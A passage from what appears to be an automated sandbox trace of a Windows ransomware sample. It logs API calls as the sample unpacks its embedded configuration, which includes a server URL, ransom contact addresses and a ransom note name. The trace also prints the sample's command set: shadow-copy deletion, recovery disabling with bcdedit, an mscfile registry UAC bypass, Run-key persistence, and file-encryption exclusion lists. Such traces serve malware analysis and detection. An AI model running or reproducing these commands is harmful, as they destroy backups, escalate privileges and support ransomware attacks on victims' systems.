lpPerformanceCount=0x12fc38*=17236765428) returned 1 [0115.578] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x52\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x64\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x67\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x47\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x67\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x37\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x56\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, 
lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x7a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x69\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x43\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x38\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x7a\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x77\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6d\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x73\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0115.579] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0115.579] LoadStringW (in: hInstance=0x400000, 
uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0115.579] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0115.579] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0115.579] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0115.579] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0115.579] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0115.579] LockResource (hResData=0x50d55c) returned 0x50d55c [0115.579] FreeResource (hResData=0x50d55c) returned 0 [0115.579] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0115.580] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0115.580] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0115.580] LockResource (hResData=0x50d64c) returned 0x50d64c [0115.580] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0115.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1504f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0115.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1504f60, cbMultiByte=38, lpWideCharStr=0x14fde4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0115.580] FreeResource (hResData=0x50d64c) returned 0 [0115.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0115.580] 
WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1504f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0115.580] GetCurrentThreadId () returned 0xdec [0115.580] GetCurrentThreadId () returned 0xdec [0115.580] GetCurrentThreadId () returned 0xdec [0115.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14bcd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0115.580] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x14bcd18, cbMultiByte=239, lpWideCharStr=0x14c2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0115.580] GetCurrentThreadId () returned 0xdec [0115.580] GetCurrentThreadId () returned 0xdec [0115.580] GetCurrentThreadId () returned 0xdec [0115.580] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0115.580] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x14b399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0115.580] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x14b399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0115.580] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0115.583] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=28, fCreate=0 | out: 
pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0115.583] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0115.584] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0115.585] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0115.586] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0115.586] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0115.587] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0115.588] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x14b39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0115.591] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x149c63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0115.591] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x149c63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0115.591] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x149c63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0115.591] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x149c63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0115.591] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0115.591] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0115.591] SizeofResource (hModule=0x400000, 
hResInfo=0x51c380) returned 0x582 [0115.591] LockResource (hResData=0x50d72c) returned 0x50d72c [0115.591] FreeResource (hResData=0x50d72c) returned 0 [0115.591] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0115.591] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0115.591] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0115.591] LockResource (hResData=0x50d64c) returned 0x50d64c [0115.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1505008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0115.591] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1505008, cbMultiByte=38, lpWideCharStr=0x14fdeac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0115.591] FreeResource (hResData=0x50d64c) returned 0 [0115.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0115.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x150500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0115.591] GetCurrentThreadId () returned 0xdec [0115.591] GetCurrentThreadId () returned 0xdec [0115.591] GetCurrentThreadId () returned 0xdec [0115.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x149e688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0115.592] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x149e688, cbMultiByte=1410, lpWideCharStr=0x14b9afc, cchWideChar=1410 | out: 
lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0115.592] GetCurrentThreadId () returned 0xdec [0115.592] GetCurrentThreadId () returned 0xdec [0115.592] GetCurrentThreadId () returned 0xdec [0115.592] GetCurrentThread () returned 0xfffffffe [0115.592] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0115.592] GetLastError () returned 0x3f0 [0115.592] GetCurrentProcess () 
returned 0xffffffff [0115.592] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0115.592] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x14b7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x14b7ae0, ReturnLength=0x12fc60) returned 1 [0115.592] CloseHandle (hObject=0xb8) returned 1 [0115.592] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x706438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0115.592] EqualSid (pSid1=0x706438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14b7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0115.593] EqualSid (pSid1=0x706438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14b7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0115.593] EqualSid (pSid1=0x706438*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x14b7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), 
SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0115.593] GetCurrentProcess () returned 0xffffffff [0115.593] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0115.593] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0115.593] GetLastError () returned 0x7a [0115.593] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x7076d8 [0115.593] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x7076d8, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x7076d8, ReturnLength=0x12fc64) returned 1 [0115.593] GetSidSubAuthorityCount (pSid=0x7076e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x7076e1 [0115.593] GetSidSubAuthority (pSid=0x7076e0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x7076e8 [0115.593] LocalFree (hMem=0x7076d8) returned 0x0 [0115.593] CloseHandle (hObject=0xb8) returned 1 [0115.593] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0115.593] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0115.593] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0115.593] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0115.593] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0115.593] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0115.593] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="P:\\") 
returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0115.594] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0115.595] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0115.595] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0115.595] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0115.595] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0115.595] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0115.595] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0115.595] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0115.595] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0115.595] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0115.595] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0115.595] LockResource (hResData=0x516824) returned 0x516824 [0115.595] FreeResource (hResData=0x516824) returned 0 [0115.595] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0115.595] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0115.595] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0115.595] LockResource (hResData=0x50d64c) returned 0x50d64c [0115.595] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1505008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0115.595] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1505008, cbMultiByte=38, lpWideCharStr=0x14fdeac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0115.595] FreeResource (hResData=0x50d64c) returned 0 [0115.595] WideCharToMultiByte (in: 
CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0115.595] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x150500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0115.596] GetCurrentThreadId () returned 0xdec [0115.596] GetCurrentThreadId () returned 0xdec [0115.596] GetCurrentThreadId () returned 0xdec [0115.596] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1490128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0115.596] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1490128, cbMultiByte=615, lpWideCharStr=0x149c65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", 
cchCount2=10) returned 2 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0115.596] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, 
